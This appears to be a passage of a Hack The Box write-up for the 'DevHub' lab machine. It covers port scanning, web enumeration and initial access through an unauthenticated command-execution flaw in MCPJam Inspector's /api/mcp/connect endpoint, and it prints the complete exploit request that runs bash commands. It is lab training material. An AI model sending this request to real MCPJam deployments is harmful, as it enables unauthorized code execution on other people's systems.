Hack The Box - HTB DevHub Writeup - Medium - Weekly - May 31th, 2026

1337 Sheets
1337 Sheets
·
Hack The Box - HTB DevHub Writeup - Medium - Weekly - May 31th, 2026

HTB Machine: DevHub

IP: <TARGET_IP>
Attacker IP: <ATTACKER_IP>
OS: Ubuntu 22.04.5 LTS
Difficulty: Medium
Category: Web / MCP Ecosystem / Lateral Movement

Reconnaissance

Port Scan

nmap -Pn -T4 -sV -p- --min-rate 2000 <TARGET_IP>

PORT     STATE  SERVICE  VERSION
22/tcp   open   ssh      OpenSSH 8.9p1 Ubuntu 3ubuntu0.15
80/tcp   open   http     nginx 1.18.0 (Ubuntu)
6274/tcp open   http     MCPJam Inspector (Node.js)

Internal-only ports discovered later via process enumeration:

5000/tcp  OPSMCP Flask server  (127.0.0.1 only)
8888/tcp  JupyterLab           (127.0.0.1 only)

Web Enumeration — Port 80

Adding devhub.htb to /etc/hosts and visiting port 80 reveals a static nginx landing page for DevHub — Internal Development & Analytics Platform. Three service cards are listed:

Service Status Notes
MCP Inspector Active — Port 6274 MCPJam Inspector
Analytics Dashboard Internal Only — localhost:8888 JupyterLab, runs as analyst
Code Repository Maintenance Mode Internal Git

The Jupyter card explicitly states access is restricted to the analyst team — an early signal that analyst is a meaningful user.

MCPJam Inspector — Port 6274

Browsing to http://devhub.htb:6274/ loads the MCPJam Inspector UI. MCPJam is an open-source developer tool for connecting to, testing, and debugging MCP servers.

API surface enumeration:

curl -s http://<TARGET_IP>:6274/api/mcp/servers
# {"success":true,"servers":[]}

curl -s -X POST http://<TARGET_IP>:6274/api/mcp/connect \
  -H 'Content-Type: application/json' -d '{}'
# {"success":false,"error":"..."}

The /api/mcp/connect endpoint accepts a serverConfig JSON body. This is the attack surface.

Initial Access — MCPJam Inspector RCE (CVE-2026-23744)

Vulnerability Analysis

The POST /api/mcp/connect endpoint allows a client to specify an MCP server to connect to. When the transport type is stdio, MCPJam spawns the given command with args as a subprocess and communicates with it over stdin/stdout using the MCP JSON-RPC protocol.

There is no authentication on this endpoint and no validation of the command field. Any OS binary can be specified and will be executed as the user running the MCPJam process (mcp-dev).

Exploitation request:

POST /api/mcp/connect HTTP/1.1
Host: devhub.htb:6274
Content-Type: application/json
Origin: http://localhost:6274

{
  "serverId": "pwn",
  "serverConfig": {
    "type": "stdio",
    "command": "bash",
    "args": ["-c", "<OS COMMAND>"],
    "env": {"PATH": "/usr/bin:/bin"}
  }
}

The response will always report "Connection closed" because bash exits after running the command (it never speaks the MCP protocol), but the command executes before bash terminates.

Outbound firewall note: The target host firewall permits outbound HTTP (port 80) but blocks raw TCP reverse shells (/dev/tcp). This rules out traditional reverse shells. SSH key injection is used instead, which requires no outbound connection from the target.